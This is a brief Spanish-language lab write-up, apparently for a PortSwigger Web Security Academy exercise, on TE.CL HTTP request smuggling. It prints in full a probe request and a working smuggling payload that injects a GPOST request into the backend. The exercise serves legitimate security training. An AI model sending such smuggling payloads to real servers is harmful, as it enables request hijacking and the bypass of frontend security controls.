b0ysie7e

Appearance

20260218224859.png

LAB

Al construir nuestra solicitud http request smuggling y enviarlo, observamos que este nos devuelve una respuesta: "Unrecognized method ABC0POST"

c
POST / HTTP/1.1
Host: 0aa700b403768c7880590d790019007d.web-security-academy.net
Content-Length: 3
Transfer-Encoding: chunked

3
abc
0

20260218230119.png

Por lo que podemos concluir que el stio web es vulnerable a http request smuggling. Ahora procedemos a construir nuestra solicitud para enviar una con el método GPOST. Teniendo en cuenta que el frontend acepta Transfer-Encoding y el backend Content-Length.

c
POST / HTTP/1.1
Host: 0aa700b403768c7880590d790019007d.web-security-academy.net
Content-Length: 3
Transfer-Encoding: chunked

71
GPOST / HTTP/1.1
Host: 0aa700b403768c7880590d790019007d.web-security-academy.net
Content-Length: 9

x=testing
0

Procedemos a enviar y al enviar la segunda solicitud vemos que logramos generar una solicitud GPOST

20260218230639.png